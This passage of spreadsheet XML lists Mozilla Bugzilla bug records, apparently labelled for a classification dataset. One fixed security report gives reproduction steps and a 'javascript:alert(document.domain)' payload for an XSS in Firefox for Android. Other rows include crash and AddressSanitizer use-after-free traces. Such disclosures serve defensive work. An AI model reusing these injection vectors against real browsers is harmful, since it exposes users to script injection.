          <t>social-engineered XSS on default search provider via javascript:alert(1) URL which is SENT from another app</t>
        </is>
      </c>
      <c r="D4458" t="inlineStr">
        <is>
          <t>2024-05-30 10:50:36 -0700</t>
        </is>
      </c>
      <c r="E4458" t="n">
        <v>1</v>
      </c>
      <c r="F4458" t="n">
        <v>1</v>
      </c>
      <c r="G4458" t="n">
        <v>2</v>
      </c>
      <c r="H4458" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4458" t="inlineStr">
        <is>
          <t>Fenix</t>
        </is>
      </c>
      <c r="J4458" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4458" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4458" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4458" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N4458" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4458" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4458" t="inlineStr">
        <is>
          <t>[reporter-external] [web-bounty-form][adv-main95+]</t>
        </is>
      </c>
      <c r="Q4458" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4458" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S4458" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4458" t="n">
        <v>1</v>
      </c>
      <c r="U4458" t="n">
        <v>0</v>
      </c>
      <c r="V4458" t="n">
        <v>68</v>
      </c>
      <c r="W4458" t="inlineStr">
        <is>
          <t>Created attachment 9249705
Uxss
hello Firefox security team,
i think it's a uxss vulnerability triggering android Firefox users, when i try to execute javascript:alert(1) in Firefox it doesn't work. to trigger it I use the Google translate app and translate javascript:alert(document.domain)// then I share it with Firefox users then uxss will be triggered there.
Production steps:
1. enter the android app and translate javascript:alert(1) // then share it to Firefox android
2. successfully shared Firefox will point to google, with a javascript:alert(1) search
3. just press once search on Firefox web then enter then uxss will be triggered.
scenario :
I think not everyone understands this problem, maybe when the javascript that is shared from the translate apps to Firefox users, ordinary victims will use the search feature of Firefox and accidentally press enter because there is no back button. with this xss will be triggered
PoC videos :
https://drive.google.com/file/d/1dEXjgypdjKb_eZNIW3Pf7WIY5Cjkmqq7/view?usp=sharing
Impact :
Uxss via javascript shared by translate apps to Firefox android users</t>
        </is>
      </c>
      <c r="X4458" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4459">
      <c r="A4459" t="n">
        <v>1054723</v>
      </c>
      <c r="B4459" t="inlineStr">
        <is>
          <t>2014-08-17 01:06:24 -0700</t>
        </is>
      </c>
      <c r="C4459" t="inlineStr">
        <is>
          <t>error on add-on upload: validation error</t>
        </is>
      </c>
      <c r="D4459" t="inlineStr">
        <is>
          <t>2016-02-04 14:46:40 -0800</t>
        </is>
      </c>
      <c r="E4459" t="n">
        <v>1</v>
      </c>
      <c r="F4459" t="n">
        <v>1</v>
      </c>
      <c r="G4459" t="n">
        <v>6</v>
      </c>
      <c r="H4459" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4459" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J4459" t="inlineStr">
        <is>
          <t>Add-on Validation</t>
        </is>
      </c>
      <c r="K4459" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4459" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4459" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4459" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4459" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4459" t="inlineStr"/>
      <c r="Q4459" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4459" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4459" t="inlineStr">
        <is>
          <t>2014-09</t>
        </is>
      </c>
      <c r="T4459" t="n">
        <v>1</v>
      </c>
      <c r="U4459" t="n">
        <v>3</v>
      </c>
      <c r="V4459" t="n">
        <v>27</v>
      </c>
      <c r="W4459" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0 (Beta/Release)
Build ID: 20140716183446
Steps to reproduce:
There are many reports that users can not upload to AMO. They often state it as failure at validation stage.
https://forums.mozilla.org/addons/viewtopic.php?f=23&amp;t=19805
https://forums.mozilla.org/addons/viewtopic.php?f=20&amp;t=19803
https://forums.mozilla.org/addons/viewtopic.php?f=7&amp;t=19795
https://forums.mozilla.org/addons/viewtopic.php?f=20&amp;t=19799
I am an amo-editor and have not seen any new addon added to the queue for the last 24 hours.
I have also noticed intermittent errors from validator while reviewing addon.
Examples are, "Error: The package could not be found" (while file is displayed), or code error (very long string of error)</t>
        </is>
      </c>
      <c r="X4459" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4460">
      <c r="A4460" t="n">
        <v>436092</v>
      </c>
      <c r="B4460" t="inlineStr">
        <is>
          <t>2008-05-28 06:10:51 -0700</t>
        </is>
      </c>
      <c r="C4460" t="inlineStr">
        <is>
          <t>increase RAM on qm-centos5-moz2-01 and qm-win2k3-moz2-01 to see if it improves reliability</t>
        </is>
      </c>
      <c r="D4460" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E4460" t="n">
        <v>1</v>
      </c>
      <c r="F4460" t="n">
        <v>1</v>
      </c>
      <c r="G4460" t="n">
        <v>5</v>
      </c>
      <c r="H4460" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4460" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4460" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4460" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4460" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4460" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4460" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4460" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4460" t="inlineStr"/>
      <c r="Q4460" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4460" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4460" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4460" t="n">
        <v>1</v>
      </c>
      <c r="U4460" t="n">
        <v>0</v>
      </c>
      <c r="V4460" t="n">
        <v>3</v>
      </c>
      <c r="W4460" t="inlineStr">
        <is>
          <t>see bug 435064, bug 428865 and bug 431745 for background.
we'd like to see if bumping the RAM to 2GB on qm-centos5-moz2-01 and qm-win2k3-moz2-01 improves their reliability at all.</t>
        </is>
      </c>
      <c r="X4460" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4461">
      <c r="A4461" t="n">
        <v>1551365</v>
      </c>
      <c r="B4461" t="inlineStr">
        <is>
          <t>2019-05-13 17:23:44 -0700</t>
        </is>
      </c>
      <c r="C4461" t="inlineStr">
        <is>
          <t>[Automated review] warning about "failing to save or free storage" when storing result to an outparam</t>
        </is>
      </c>
      <c r="D4461" t="inlineStr">
        <is>
          <t>2022-08-17 14:01:35 -0700</t>
        </is>
      </c>
      <c r="E4461" t="n">
        <v>1</v>
      </c>
      <c r="F4461" t="n">
        <v>1</v>
      </c>
      <c r="G4461" t="n">
        <v>7</v>
      </c>
      <c r="H4461" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4461" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="J4461" t="inlineStr">
        <is>
          <t>Source Code Analysis</t>
        </is>
      </c>
      <c r="K4461" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4461" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4461" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4461" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4461" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4461" t="inlineStr"/>
      <c r="Q4461" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4461" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4461" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4461" t="n">
        <v>1</v>
      </c>
      <c r="U4461" t="n">
        <v>0</v>
      </c>
      <c r="V4461" t="n">
        <v>8</v>
      </c>
      <c r="W4461" t="inlineStr">
        <is>
          <t>**Phabricator URL:** https://phabricator.services.mozilla.com/D30869#inline-180558
Here we have some FFI functions that Rust calls into to allocate some C++ objects.  Since the intention is to allocate the objects, it makes sense to assign the result of the `new` to an outparam.  We can't use complex types like `UniquePtr` or `already_AddRefed` in FFI signatures.
Is there a way to avoid this warning?</t>
        </is>
      </c>
      <c r="X4461" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4462">
      <c r="A4462" t="n">
        <v>506155</v>
      </c>
      <c r="B4462" t="inlineStr">
        <is>
          <t>2009-07-23 17:45:21 -0700</t>
        </is>
      </c>
      <c r="C4462" t="inlineStr">
        <is>
          <t>[W-2.2.2] Collection ratings in directory</t>
        </is>
      </c>
      <c r="D4462" t="inlineStr">
        <is>
          <t>2016-02-04 14:48:15 -0800</t>
        </is>
      </c>
      <c r="E4462" t="n">
        <v>1</v>
      </c>
      <c r="F4462" t="n">
        <v>1</v>
      </c>
      <c r="G4462" t="n">
        <v>6</v>
      </c>
      <c r="H4462" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4462" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J4462" t="inlineStr">
        <is>
          <t>Collections</t>
        </is>
      </c>
      <c r="K4462" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4462" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4462" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4462" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4462" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4462" t="inlineStr"/>
      <c r="Q4462" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4462" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4462" t="inlineStr">
        <is>
          <t>5.0.9</t>
        </is>
      </c>
      <c r="T4462" t="n">
        <v>1</v>
      </c>
      <c r="U4462" t="n">
        <v>0</v>
      </c>
      <c r="V4462" t="n">
        <v>8</v>
      </c>
      <c r="W4462" t="inlineStr">
        <is>
          <t>The Collection Directory should display each collection's rating.
Assigning to chowse for designs.</t>
        </is>
      </c>
      <c r="X4462" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4463">
      <c r="A4463" t="n">
        <v>225973</v>
      </c>
      <c r="B4463" t="inlineStr">
        <is>
          <t>2003-11-17 07:35:34 -0800</t>
        </is>
      </c>
      <c r="C4463" t="inlineStr">
        <is>
          <t>Logins are broken on systems that use Blowfish for crypt()</t>
        </is>
      </c>
      <c r="D4463" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:37 -0800</t>
        </is>
      </c>
      <c r="E4463" t="n">
        <v>1</v>
      </c>
      <c r="F4463" t="n">
        <v>1</v>
      </c>
      <c r="G4463" t="n">
        <v>4</v>
      </c>
      <c r="H4463" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4463" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4463" t="inlineStr">
        <is>
          <t>User Accounts</t>
        </is>
      </c>
      <c r="K4463" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4463" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4463" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4463" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4463" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4463" t="inlineStr"/>
      <c r="Q4463" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4463" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4463" t="inlineStr">
        <is>
          <t>Bugzilla 2.20</t>
        </is>
      </c>
      <c r="T4463" t="n">
        <v>1</v>
      </c>
      <c r="U4463" t="n">
        <v>0</v>
      </c>
      <c r="V4463" t="n">
        <v>22</v>
      </c>
      <c r="W4463" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.5) Gecko/20030925
Build Identifier: 
The bugzill instalation was done on a FreeBSD box (4.8-RELEASE-p13)
with Blowfish as the crypt algoritm.
The Bugzilla logins are completly broken.
Not even the administrator can log in.
The problem seems to be, the cryptpassword column in the profiles table is too
small for the Blowfish passwords.
The cryptpassword column is varchar(34) originally.
The blowfish encrypted password is about 60 characters long.
To be on the safe side, I changed the varchar(34) to varchar(128).
With this in place the login now works.
Reproducible: Always
Steps to Reproduce:
1.Follow instalation as specified
2.try to login 
Actual Results:  
I was unable to login into bugzilla.
Expected Results:  
Bugzilla should let me in.
The blowfish style password is:
$2a$04$xxxxxxxxxxxxxxxxxxxxxxyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
where 
the 2a means blowfish.
the 04 means 4 rounds of encryption.
the xxxxxxxxxxxxxxxxxxxxxx seems to be 23 characters of the salt or something
like it.
The yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy is 32 characters of the hash.</t>
        </is>
      </c>
      <c r="X4463" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4464">
      <c r="A4464" t="n">
        <v>210553</v>
      </c>
      <c r="B4464" t="inlineStr">
        <is>
          <t>2003-06-24 15:23:06 -0700</t>
        </is>
      </c>
      <c r="C4464" t="inlineStr">
        <is>
          <t>Problems launching external links from other applications when Firebird is default browser, XML parsing error (Error "No XBL binding for browser" appears when trying to launch from Eudora, snak, etc.)</t>
        </is>
      </c>
      <c r="D4464" t="inlineStr">
        <is>
          <t>2004-10-01 19:30:40 -0700</t>
        </is>
      </c>
      <c r="E4464" t="n">
        <v>1</v>
      </c>
      <c r="F4464" t="n">
        <v>1</v>
      </c>
      <c r="G4464" t="n">
        <v>2</v>
      </c>
      <c r="H4464" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4464" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4464" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4464" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4464" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M4464" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4464" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4464" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4464" t="inlineStr">
        <is>
          <t>See comment 3 for current symptoms.</t>
        </is>
      </c>
      <c r="Q4464" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4464" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4464" t="inlineStr">
        <is>
          <t>Firebird0.8</t>
        </is>
      </c>
      <c r="T4464" t="n">
        <v>1</v>
      </c>
      <c r="U4464" t="n">
        <v>30</v>
      </c>
      <c r="V4464" t="n">
        <v>57</v>
      </c>
      <c r="W4464" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.5a) Gecko/20030623 Mozilla Firebird/0.6
Build Identifier: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.5a) Gecko/20030623 Mozilla Firebird/0.6
While this bug is listed in Bugzilla for Mozilla at large, I feel I should
report the bug because it's been my unfortunate experience that Firebird is
significantly more "willing" to throw this error and is therefore considerably
less usable. I have used both Mozilla and Firebird, and unfortunately the
problem happens just about every single time with Firebird.
The exact problem is that when setting Firebird as the system default browser in
the Internet preferences pane (I'm using Mac OS X 10.2.6) and
double-command-clicking on URLs in Snak, an IRC client, or when using Eudora,
which is set to use Contents/MacOS/MozillaFirebird-bin as the browser to launch,
I get the nasty top-left-of-screen "error launching browser: no XBL binding for
window". Sometimes, I can't even click OK on the dialog box to make it go away
and have to quit (command-Q) the browser to make it go.
Reproducible: Always
Steps to Reproduce:
1. Set Firebird to the default browser as described above in Details
2. Use application built-in URL launching to try to load any URL
3. Error appears
Actual Results:  
Error dialog box appears complaining of no XBL binding for browser, with
hard-to-remove error dialog box sometimes, and certainly never the requested
browser window
Expected Results:  
Launched the URL in a browser window</t>
        </is>
      </c>
      <c r="X4464" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4465">
      <c r="A4465" t="n">
        <v>418293</v>
      </c>
      <c r="B4465" t="inlineStr">
        <is>
          <t>2008-02-18 13:36:15 -0800</t>
        </is>
      </c>
      <c r="C4465" t="inlineStr">
        <is>
          <t>Crash when stopping at breakpoint set by Venkman [@ ComputeGlobalThis]</t>
        </is>
      </c>
      <c r="D4465" t="inlineStr">
        <is>
          <t>2011-06-09 14:58:47 -0700</t>
        </is>
      </c>
      <c r="E4465" t="n">
        <v>1</v>
      </c>
      <c r="F4465" t="n">
        <v>1</v>
      </c>
      <c r="G4465" t="n">
        <v>3</v>
      </c>
      <c r="H4465" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4465" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4465" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4465" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4465" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4465" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4465" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4465" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4465" t="inlineStr"/>
      <c r="Q4465" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4465" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4465" t="inlineStr">
        <is>
          <t>mozilla1.9beta4</t>
        </is>
      </c>
      <c r="T4465" t="n">
        <v>1</v>
      </c>
      <c r="U4465" t="n">
        <v>0</v>
      </c>
      <c r="V4465" t="n">
        <v>21</v>
      </c>
      <c r="W4465" t="inlineStr">
        <is>
          <t>#0  JS_Assert (s=0x110e554 "!fp-&gt;thisp &amp;&amp; fp-&gt;argv == argv", file=0x110e124 "/Users/henrik/Projects/mozilla/source/mozilla/js/src/jsinterp.c", ln=928) at /Users/henrik/Projects/mozilla/source/mozilla/js/src/jsutil.c:63
#1  0x010626e1 in ComputeGlobalThis (cx=0x3df70010, lazy=1, argv=0x25d498c) at /Users/henrik/Projects/mozilla/source/mozilla/js/src/jsinterp.c:928
#2  0x010629d3 in js_ComputeThis (cx=0x3df70010, lazy=1, argv=0x25d498c) at /Users/henrik/Projects/mozilla/source/mozilla/js/src/jsinterp.c:995
#3  0x01035b21 in JS_GetFrameThis (cx=0x3df70010, fp=0x25d4998) at /Users/henrik/Projects/mozilla/source/mozilla/js/src/jsdbgapi.c:1089
#4  0x2f886dc5 in jsd_NewThreadState (jsdc=0x36c3bc40, cx=0x3df70010) at /Users/henrik/Projects/mozilla/source/mozilla/js/jsd/jsd_stak.c:133
#5  0x2f883cfa in jsd_CallExecutionHook (jsdc=0x36c3bc40, cx=0x3df70010, type=1, hook=0x2f892c16 &lt;jsds_ExecutionHookProc(JSDContext*, JSDThreadState*, unsigned int, void*, long*)&gt;, hookData=0x1, rval=0xbfffa570) at /Users/henrik/Projects/mozilla/source/mozilla/js/jsd/jsd_hook.c:165
#6  0x2f8863d2 in jsd_TrapHandler (cx=0x3df70010, script=0x3f330ab0, pc=0x3f330af4 "S5", rval=0xbfffa570, closure=0x3c78b371) at /Users/henrik/Projects/mozilla/source/mozilla/js/jsd/jsd_scpt.c:736
#7  0x01033d49 in JS_HandleTrap (cx=0x3df70010, script=0x3f330ab0, pc=0x3f330af4 "S5", rval=0xbfffa570) at /Users/henrik/Projects/mozilla/source/mozilla/js/src/jsdbgapi.c:289
#8  0x0107e173 in js_Interpret (cx=0x3df70010, pc=0x3f330af4 "S5", result=0xbfffa8d8) at /Users/henrik/Projects/mozilla/source/mozilla/js/src/jsinterp.c:5225
#9  0x010638a8 in js_Invoke (cx=0x3df70010, argc=1, vp=0x25d4820, flags=2) at /Users/henrik/Projects/mozilla/source/mozilla/js/src/jsinterp.c:1433
#10 0x35811515 in nsXPCWrappedJSClass::CallMethod (this=0x3a044640, wrapper=0x3f3b1cf0, methodIndex=3, info=0x20cd9d0, nativeParams=0xbfffad34) at /Users/henrik/Projects/mozilla/source/mozilla/js/src/xpconnect/src/xpcwrappedjsclass.cpp:1473
#11 0x35809c6f in nsXPCWrappedJS::CallMethod (this=0x3f3b1cf0, methodIndex=3, info=0x20cd9d0, params=0xbfffad34) at /Users/henrik/Projects/mozilla/source/mozilla/js/src/xpconnect/src/xpcwrappedjs.cpp:556
#12 0x0139788a in PrepareAndDispatch (self=0x3f3b1d30, methodIndex=3, args=0xbfffae54) at /Users/henrik/Projects/mozilla/source/mozilla/xpcom/reflect/xptcall/src/md/unix/xptcstubs_unixish_x86.cpp:93
#13 0x013978e8 in nsXPTCStubBase::Stub3 (this=0x3f3b1d30) at ../../../../../../dist/include/xpcom/xptcstubsdef.inc:5
#14 0x1604090e in nsEventListenerManager::HandleEventSubType (this=0x3f39fb90, aListenerStruct=0x3f39b058, aListener=0x3f3b1d30, aDOMEvent=0x3e61edbc, aCurrentTarget=0x3e326e20, aPhaseFlags=6) at /Users/henrik/Projects/mozilla/source/mozilla/content/events/src/nsEventListenerManager.cpp:1082
#15 0x1604267b in nsEventListenerManager::HandleEvent (this=0x3f39fb90, aPresContext=0x3f31cf10, aEvent=0xbfffb1f4, aDOMEvent=0xbfffb124, aCurrentTarget=0x3e326e20, aFlags=6, aEventStatus=0xbfffb128) at /Users/henrik/Projects/mozilla/source/mozilla/content/events/src/nsEventListenerManager.cpp:1184
#16 0x16067b5f in nsEventTargetChainItem::HandleEvent (this=0x3d20b920, aVisitor=@0xbfffb11c, aFlags=6) at /Users/henrik/Projects/mozilla/source/mozilla/content/events/src/nsEventDispatcher.cpp:206
#17 0x16067d31 in nsEventTargetChainItem::HandleEventTargetChain (this=0x3d20b9c0, aVisitor=@0xbfffb11c, aFlags=6, aCallback=0x0) at /Users/henrik/Projects/mozilla/source/mozilla/content/events/src/nsEventDispatcher.cpp:264
#18 0x160685e2 in nsEventDispatcher::Dispatch (aTarget=0x3e326e20, aPresContext=0x3f31cf10, aEvent=0xbfffb1f4, aDOMEvent=0x0, aEventStatus=0xbfffb23c, aCallback=0x0) at /Users/henrik/Projects/mozilla/source/mozilla/content/events/src/nsEventDispatcher.cpp:479
#19 0x15dbcdab in PresShell::HandleDOMEventWithTarget (this=0x3d164200, aTargetContent=0x3e326e20, aEvent=0xbfffb1f4, aStatus=0xbfffb23c) at /Users/henrik/Projects/mozilla/source/mozilla/layout/base/nsPresShell.cpp:5886
#20 0x15f5de8d in nsButtonBoxFrame::DoMouseClick (this=0x259b7a0, aEvent=0xbfffb51c, aTrustEvent=0) at /Users/henrik/Projects/mozilla/source/mozilla/layout/xul/base/src/nsButtonBoxFrame.cpp:160</t>
        </is>
      </c>
      <c r="X4465" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4466">
      <c r="A4466" t="n">
        <v>444452</v>
      </c>
      <c r="B4466" t="inlineStr">
        <is>
          <t>2008-07-09 14:59:01 -0700</t>
        </is>
      </c>
      <c r="C4466" t="inlineStr">
        <is>
          <t>Crash with adding weird character into input</t>
        </is>
      </c>
      <c r="D4466" t="inlineStr">
        <is>
          <t>2008-12-30 11:17:53 -0800</t>
        </is>
      </c>
      <c r="E4466" t="n">
        <v>1</v>
      </c>
      <c r="F4466" t="n">
        <v>1</v>
      </c>
      <c r="G4466" t="n">
        <v>3</v>
      </c>
      <c r="H4466" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4466" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4466" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K4466" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4466" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4466" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N4466" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4466" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4466" t="inlineStr">
        <is>
          <t>[sg:critical?][fixed by bug 445711]</t>
        </is>
      </c>
      <c r="Q4466" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4466" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4466" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4466" t="n">
        <v>1</v>
      </c>
      <c r="U4466" t="n">
        <v>0</v>
      </c>
      <c r="V4466" t="n">
        <v>12</v>
      </c>
      <c r="W4466" t="inlineStr">
        <is>
          <t>Created attachment 328755
testcase
See testcase, which usually crashes within 10s after load.
I got this with the indic IME extension, when pressing the letter 'g' constantly, while Hindi language was selected and Inscript keyboard.
This regressed between 2007-08-28 and 2007-08-29:
http://bonsai.mozilla.org/cvsquery.cgi?treeid=default&amp;module=all&amp;branch=HEAD&amp;branchtype=match&amp;dir=&amp;file=&amp;filetype=match&amp;who=&amp;whotype=match&amp;sortby=Date&amp;hours=2&amp;date=explicit&amp;mindate=2007-08-28+04&amp;maxdate=2007-08-29+08&amp;cvsroot=%2Fcvsroot
I think a regression from bug 378457.</t>
        </is>
      </c>
      <c r="X4466" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4467">
      <c r="A4467" t="n">
        <v>805287</v>
      </c>
      <c r="B4467" t="inlineStr">
        <is>
          <t>2012-10-24 17:34:07 -0700</t>
        </is>
      </c>
      <c r="C4467" t="inlineStr">
        <is>
          <t>Heap-use-after-free in nsTextEditorState::PrepareEditor</t>
        </is>
      </c>
      <c r="D4467" t="inlineStr">
        <is>
          <t>2024-05-30 07:34:24 -0700</t>
        </is>
      </c>
      <c r="E4467" t="n">
        <v>1</v>
      </c>
      <c r="F4467" t="n">
        <v>1</v>
      </c>
      <c r="G4467" t="n">
        <v>3</v>
      </c>
      <c r="H4467" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4467" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4467" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K4467" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4467" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4467" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4467" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4467" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4467" t="inlineStr">
        <is>
          <t>[asan][adv-track-main17+][adv-track-esr17+]</t>
        </is>
      </c>
      <c r="Q4467" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4467" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4467" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T4467" t="n">
        <v>1</v>
      </c>
      <c r="U4467" t="n">
        <v>0</v>
      </c>
      <c r="V4467" t="n">
        <v>22</v>
      </c>
      <c r="W4467" t="inlineStr">
        <is>
          <t>Created attachment 674916
Testcase
Reproduces on trunk.
=================================================================
==20748== ERROR: AddressSanitizer heap-use-after-free on address 0x7fec4cb70a60 at pc 0x7fec675d1dda bp 0x7fffdec77c10 sp 0x7fffdec77c08
READ of size 8 at 0x7fec4cb70a60 thread T0
    #0 0x7fec675d1dd9 in nsCOMPtr&lt;nsIEditor&gt;::operator=(nsCOMPtr&lt;nsIEditor&gt; const&amp;) ../../../../dist/include/nsCOMPtr.h:614
    #1 0x7fec675c7820 in nsTextEditorState::PrepareEditor(nsAString_internal const*) content/html/content/src/nsTextEditorState.cpp:1210
